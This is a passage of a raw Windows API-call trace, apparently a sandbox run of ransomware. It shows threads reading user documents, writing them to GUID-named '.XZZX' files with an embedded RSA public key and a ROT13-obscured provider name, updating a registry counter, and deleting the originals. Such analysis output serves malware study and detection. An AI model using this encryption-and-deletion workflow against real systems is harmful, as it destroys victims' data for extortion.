(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5f3f59042cd153ccc290441930fe3814.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0038.187] WriteFile (in: hFile=0x46c, lpBuffer=0x3e3f638*, nNumberOfBytesToWrite=0x19c5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e3f638*, lpNumberOfBytesWritten=0x42ce438*=0x19c5, lpOverlapped=0x0) returned 1 [0038.187] SetFilePointer (in: hFile=0x46c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x19c5 [0038.187] WriteFile (in: hFile=0x46c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0038.187] SetFilePointer (in: hFile=0x46c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x19ca [0038.187] WriteFile (in: hFile=0x46c, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x2e, lpOverlapped=0x0) returned 1 [0038.188] SetFilePointer (in: hFile=0x46c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x19f8 [0038.188] WriteFile (in: hFile=0x46c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0038.188] SetFilePointer (in: hFile=0x46c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x19fd [0038.188] SetErrorMode (uMode=0x1) returned 0x1 [0038.188] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0038.188] OutputDebugStringW (lpOutputString="end") [0038.188] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wh\x9eâ\x03`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0038.188] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0038.188] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3e2d208) returned 1 [0038.189] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2d208, dwCertEncodingType=0x1, pInfo=0x3dd1ff8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd2028*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd2030*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x3251b8) returned 1 [0038.189] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0038.189] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0038.189] CryptEncrypt (in: hKey=0x3251b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0038.189] CryptEncrypt (in: hKey=0x3251b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2d290*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2d290*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0038.189] WriteFile (in: hFile=0x46c, lpBuffer=0x3e2d290*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e2d290*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0038.189] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0038.189] WriteFile (in: hFile=0x46c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0038.189] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0038.231] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0038.231] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x464) returned 0x0 [0038.232] RegQueryValueExW (in: hKey=0x464, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x1a, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0038.232] RegCloseKey (hKey=0x464) returned 0x0 [0038.232] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x464) returned 0x0 [0038.232] RegSetValueExW (in: hKey=0x464, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x1b, cbData=0x4 | out: lpData=0x42cdfec*=0x1b) returned 0x0 [0038.232] RegCloseKey (hKey=0x464) returned 0x0 [0038.232] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0038.232] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0038.233] CloseHandle (hObject=0x46c) returned 1 [0038.233] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0038.234] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0038.234] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PJ8NaDyMfjtJM01lTM.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pj8nadymfjtjm01ltm.xlsx")) returned 1 [0038.235] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PJ8NaDyMfjtJM01lTM.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pj8nadymfjtjm01ltm.xlsx")) returned 0 Thread: id = 118 os_tid = 0x530 [0038.190] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0038.190] lstrcpyW (in: lpString1=0x417f460, lpString2="uGN1arUrfzZMomzHA.pptx" | out: lpString1="uGN1arUrfzZMomzHA.pptx") returned="uGN1arUrfzZMomzHA.pptx" [0038.190] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0038.190] SetErrorMode (uMode=0x1) returned 0x1 [0038.190] lstrcpyW (in: lpString1=0x417f860, lpString2="uGN1arUrfzZMomzHA.pptx" | out: lpString1="uGN1arUrfzZMomzHA.pptx") returned="uGN1arUrfzZMomzHA.pptx" [0038.190] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x7b5bfa37, Data2=0xa2d5, Data3=0x46a8, Data4=([0]=0xa6, [1]=0xc4, [2]=0x5e, [3]=0x21, [4]=0x91, [5]=0x41, [6]=0xe5, [7]=0xd2))) returned 0x0 [0038.190] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uGN1arUrfzZMomzHA.pptx") returned 66 [0038.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0038.190] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D7DDFDC32CF119C87B5BFA373108FE10.XZZX") returned 81 [0038.190] StrStrW (lpFirst="uGN1arUrfzZMomzHA.pptx", lpSrch="XZZX") returned 0x0 [0038.190] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uGN1arUrfzZMomzHA.pptx", dwFileAttributes=0x20) returned 1 [0038.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uGN1arUrfzZMomzHA.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ugn1arurfzzmomzha.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0038.191] ReadFile (in: hFile=0x464, lpBuffer=0x42d0048, nNumberOfBytesToRead=0x14e64, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42d0048*, lpNumberOfBytesRead=0x417e418*=0x14e64, lpOverlapped=0x0) returned 1 [0038.191] CloseHandle (hObject=0x464) returned 1 [0038.191] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3eb0000 [0038.192] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ec0000 [0038.192] SetErrorMode (uMode=0x1) returned 0x1 [0038.192] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0038.192] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2d318) returned 1 [0038.194] CryptGenKey (in: hProv=0x3e2d318, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3250f8) returned 1 [0038.358] CryptExportKey (in: hKey=0x3250f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0038.358] CryptExportKey (in: hKey=0x3250f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ec0000, pdwDataLen=0x417e41c | out: pbData=0x3ec0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0038.358] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0038.358] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0038.358] CryptDestroyKey (hKey=0x3250f8) returned 1 [0038.359] CryptReleaseContext (hProv=0x3e2d318, dwFlags=0x0) returned 1 [0038.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D7DDFDC32CF119C87B5BFA373108FE10.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\d7ddfdc32cf119c87b5bfa373108fe10.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0038.359] WriteFile (in: hFile=0x460, lpBuffer=0x42d0048*, nNumberOfBytesToWrite=0x14e64, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d0048*, lpNumberOfBytesWritten=0x417e438*=0x14e64, lpOverlapped=0x0) returned 1 [0038.361] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14e64 [0038.361] WriteFile (in: hFile=0x460, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0038.361] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14e69 [0038.361] WriteFile (in: hFile=0x460, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x2c, lpOverlapped=0x0) returned 1 [0038.361] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14e95 [0038.361] WriteFile (in: hFile=0x460, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0038.361] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14e9a [0038.361] SetErrorMode (uMode=0x1) returned 0x1 [0038.361] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0038.361] OutputDebugStringW (lpOutputString="end") [0038.362] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wh\x9eâ\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0038.362] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0038.362] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x3e2d318) returned 1 [0038.362] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2d318, dwCertEncodingType=0x1, pInfo=0x3dd18a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd18d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd18e0*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x3250f8) returned 1 [0038.362] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0038.363] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0038.363] CryptEncrypt (in: hKey=0x3250f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0038.363] CryptEncrypt (in: hKey=0x3250f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2d3a0*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2d3a0*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0038.363] WriteFile (in: hFile=0x460, lpBuffer=0x3e2d3a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e2d3a0*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0038.363] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0038.363] WriteFile (in: hFile=0x460, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0038.363] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0038.403] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0038.403] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x46c) returned 0x0 [0038.404] RegQueryValueExW (in: hKey=0x46c, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x1b, lpcbData=0x417dfdc*=0x4) returned 0x0 [0038.404] RegCloseKey (hKey=0x46c) returned 0x0 [0038.404] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x46c) returned 0x0 [0038.404] RegSetValueExW (in: hKey=0x46c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x1c, cbData=0x4 | out: lpData=0x417dfec*=0x1c) returned 0x0 [0038.404] RegCloseKey (hKey=0x46c) returned 0x0 [0038.404] VirtualFree (lpAddress=0x3eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0038.404] VirtualFree (lpAddress=0x3ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0038.405] CloseHandle (hObject=0x460) returned 1 [0038.407] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0038.408] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0038.408] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uGN1arUrfzZMomzHA.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ugn1arurfzzmomzha.pptx")) returned 1 [0038.409] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uGN1arUrfzZMomzHA.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ugn1arurfzzmomzha.pptx")) returned 0 Thread: id = 119 os_tid = 0x8dc [0038.364] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0038.364] lstrcpyW (in: lpString1=0x42cf460, lpString2="X2tQqTNWjx7lgtPo5htj.pptx" | out: lpString1="X2tQqTNWjx7lgtPo5htj.pptx") returned="X2tQqTNWjx7lgtPo5htj.pptx" [0038.366] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0038.366] SetErrorMode (uMode=0x1) returned 0x1 [0038.366] lstrcpyW (in: lpString1=0x42cf860, lpString2="X2tQqTNWjx7lgtPo5htj.pptx" | out: lpString1="X2tQqTNWjx7lgtPo5htj.pptx") returned="X2tQqTNWjx7lgtPo5htj.pptx" [0038.366] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x324d4a8b, Data2=0x89b4, Data3=0x4b1b, Data4=([0]=0xa0, [1]=0xf4, [2]=0x1f, [3]=0x32, [4]=0x0, [5]=0xcc, [6]=0x44, [7]=0x35))) returned 0x0 [0038.366] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X2tQqTNWjx7lgtPo5htj.pptx") returned 69 [0038.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0038.366] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BB3CCCBC286641FC324D4A8B2C932644.XZZX") returned 81 [0038.366] StrStrW (lpFirst="X2tQqTNWjx7lgtPo5htj.pptx", lpSrch="XZZX") returned 0x0 [0038.366] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X2tQqTNWjx7lgtPo5htj.pptx", dwFileAttributes=0x20) returned 1 [0038.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X2tQqTNWjx7lgtPo5htj.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x2tqqtnwjx7lgtpo5htj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0038.367] ReadFile (in: hFile=0x46c, lpBuffer=0x42e5eb8, nNumberOfBytesToRead=0x178a4, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesRead=0x42ce418*=0x178a4, lpOverlapped=0x0) returned 1 [0038.368] CloseHandle (hObject=0x46c) returned 1 [0038.368] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0038.369] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0038.369] SetErrorMode (uMode=0x1) returned 0x1 [0038.369] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0038.369] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2d428) returned 1 [0038.372] CryptGenKey (in: hProv=0x3e2d428, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3251f8) returned 1 [0038.593] CryptExportKey (in: hKey=0x3251f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0038.593] CryptExportKey (in: hKey=0x3251f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x42ce41c | out: pbData=0x3e60000*, pdwDataLen=0x42ce41c*=0x94) returned 1 